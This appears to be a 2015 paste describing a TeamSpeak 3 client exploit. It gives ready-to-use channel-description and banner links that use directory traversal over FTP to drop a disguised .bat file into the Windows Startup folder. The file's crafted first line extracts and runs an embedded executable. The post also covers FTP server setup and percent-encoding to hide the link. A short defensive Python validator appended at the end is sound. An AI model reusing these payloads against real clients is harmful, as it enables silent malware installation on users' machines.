_R4P3

RFI_TS3

Oct 10th, 2015
Requirements:
- FTP server
- modify channel description or server admin

TeamSpeak weak points:
- image files are not checked for file extensions (client problem)
- directory traversal is working for cached downloads (client problem)


How to include it into TeamSpeak:

- set an image into a channel description:
This will download the file when clicking the channel.
[img]ftp://8.8.8.8/../../../../../Roaming/Microsoft/Windows/Start Menu/Programs/Startup/PoC.bat[/img]

- set image into Banner Gfx URL:
This will download the file when connecting to the server.
ftp://8.8.8.8/../../../../../Roaming/Microsoft/Windows/Start Menu/Programs/Startup/PoC.bat

-> requires an anonymous user on your ftp server with power to download the according file

-> the file the user is going to download has to be a .bat file. You may make this .bat file
extract an .exe file or any other file and execute it, though :)



How it works:
- image files are not checked for file extensions by TeamSpeak, but only for 2 characters which have to be the first ones.
Those characters are: "ÿØ"

- The client is going to download any file which is starting with those two characters.
Example:

ÿØ 2>NUL & @echo off & cls stronkhackorskillz1337 & findstr /v "cls stronkhackorskillz1337" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\PoC.bat" > "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\PoC.exe" & cd "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" & start PoC.exe & del poc.bat & exit

This would be the first line in the .bat file.
It is going to delete this first line, then copy itself to a new file called PoC.exe and execute this new file. So if you copy this line into an .exe file making this the first line,
rename it to .bat -> it "extracts" the .exe and executes it.

It is important to turn on all symbols when creating this file using Notepad++
http://puu.sh/kDWDS/7631dc484c.png
Make sure the line ending for the first line looks like this:
http://puu.sh/kDWGk/447ea4c36c.png
Otherwise it won't work!
To change that ending, press CTRL-F, go to the "Replace" tab and check the search mode "Regular expression"
CR = \r
LF = \n
If the line ending shows you only LF, then place your cursor just before the line ending and click "Replace" two times until it shows you "1 occurrence was replaced." Example in this picture:
http://puu.sh/kDWPU/74b114fabe.png

- Directory traversal is working when downloading files with TeamSpeak, so by default, the file will get downloaded to one of the two locations (depends on whether they upgraded to Win10)
%appdata%\Roaming\TS3Client\cache\remote\banner.4players.de
%appdata%\Local\TS3Client\cache\remote\banner.4players.de

So to escape there and get into the startup folder, you'll have to go up 5 times: ../../../../../

Because we wanted to place the file into the startup directory, we then simply added the path to the startup to the link -> /Roaming/Microsoft/Windows/Start Menu/Programs/Startup/PoC.bat


Setting up your FTP server:
- Let's assume you want your file to be downloaded into the startup directory.
So let's assume you go to your ftp server from outside (ftp://8.8.8.8). This will be your home directory.
So if you want the file to be downloaded to the startup directory you will have to set up the following directories:

Roaming/Microsoft/Windows/Start Menu/Programs/Startup/

Inside there you may put any file you want to be downloaded. Remember this has to be a .bat file, because the first two characters have to be "ÿØ". This is only possible with .bat (as far as we tried it)

- Set up an anonymous user for ftp:
In order to download the files without problems, you'll have to create an anonymous user with permissions to download from this directory.
If you want them to upload something, you'll obviously have to grant some upload powers as well



Obfuscation:
- When putting the image link into the channel description, you might as well obfuscate the link so no one sees how it's done.
This does not work when putting the link into the server's banner gfx URL!

Examples:

Roaming -> %52%6F%61%6D%69%6E%67
8.8.8.8 -> 8%2e8%2e8%2e8
Microsoft -> %4d%69%63%72%6f%73%6f%66%74
[img]ftp://8.8.8.8/../../../../../Roaming/Microsoft/Windows/Start Menu/Programs/Startup/PoC.bat[/img]
[img]ftp://8%2e8%2e8%2e8/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%52%6F%61%6D%69%6E%67%4d%69%63%72%6f%73%6f%66%74%2f%57%69%6e%64%6f%77%73%2f%53%74%61%72%74%20%4d%65%6e%75%2f%50%72%6f%67%72%61%6d%73%2f%53%74%61%72%74%75%70%2f%50%6F%43%2e%62%61%74[/img]

so the conversion rules:

! %21
" %22
# %23
$ %24
% %25
& %26
' %27
( %28
) %29
* %2A
+ %2B
, %2C
- %2D
. %2e
/ %2f (the "/" behind the IP and before has to stay)
0 %30
1 %31
2 %32
3 %33
4 %34
5 %35
6 %36
7 %37
8 %38
9 %39
: %3A
; %3B
< %3C
= %3D
> %3E
? %3F
@ %40
A %41
B %42
C %43
D %44
E %45
F %46
G %47
H %48
I %49
J %4A
K %4B
L %4C
M %4D
N %4E
O %4F
P %50
Q %51
R %52
S %53
T %54
U %55
V %56
W %57
X %58
Y %59
Z %5A
[ %5B
\ %5C
] %5D
^ %5E
_ %5F
` %60
a %61
b %62
c %63
d %64
e %65
f %66
g %67
h %68
i %69
j %6A
k %6B
l %6C
m %6D
n %6E
o %6F
p %70
q %71
r %72
s %73
t %74
u %75
v %76
w %77
x %78
y %79
z %7A
{ %7B
| %7C
} %7D
~ %7E
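The two client weak points above (a two-character "image" check and directory traversal out of the cache folder, with percent-encoding hiding the ".." in the link) are closed by the checks below. This is an added example written for this page, not TeamSpeak's code; CACHE_ROOT, the extension allow-list and the magic table are assumptions.

```python
import os
from urllib.parse import urlsplit, unquote

# Constructed cache root for the example; the real TS3Client cache paths are given in the text above.
CACHE_ROOT = "/cache/remote"
# Assumed allow-list: which file extensions may be cached and what content each must carry.
ALLOWED = {".jpg": "jpeg", ".jpeg": "jpeg", ".png": "png", ".gif": "gif"}
# Full file signatures, not just the two bytes FF D8 ("ÿØ") the client was checking.
MAGIC = {"jpeg": b"\xff\xd8\xff", "png": b"\x89PNG\r\n\x1a\n", "gif": b"GIF8"}


def fully_decode(s: str) -> str:
    """Percent-decode until stable, so %2e%2e, %252e%252e, ... all end up as '..'."""
    for _ in range(5):
        d = unquote(s)
        if d == s:
            return d
        s = d
    return s


def resolve_cache_path(url: str, cache_root: str = CACHE_ROOT):
    """Map a remote image URL to cache_root/<host>/<path>; None if it would escape."""
    parts = urlsplit(url)
    host = fully_decode(parts.hostname or "")  # 8%2e8%2e8%2e8 -> 8.8.8.8
    if not host or "/" in host or "\\" in host or ".." in host:
        return None
    rel = fully_decode(parts.path).replace("\\", "/").lstrip("/")
    base = os.path.normpath(os.path.join(cache_root, host))
    dest = os.path.normpath(os.path.join(base, rel))  # collapses ../../../../../
    if os.path.commonpath([base, dest]) != base:
        return None  # traversal left the per-host cache directory
    return dest


def sniff_image(data: bytes):
    """Identify the image type by its complete signature."""
    for kind, magic in MAGIC.items():
        if data.startswith(magic):
            return kind
    return None


def accept_download(url: str, data: bytes, cache_root: str = CACHE_ROOT):
    """Return the cache path only if path, extension and content all agree."""
    dest = resolve_cache_path(url, cache_root)
    if dest is None:
        return None
    ext = os.path.splitext(dest)[1].lower()
    if ext not in ALLOWED or sniff_image(data) != ALLOWED[ext]:
        return None  # .bat, or bytes that merely start with FF D8
    return dest
```

The page's own banner link, plain or percent-encoded, is rejected by resolve_cache_path, and the .bat first line shown above fails sniff_image because its third byte is a space rather than a JPEG marker.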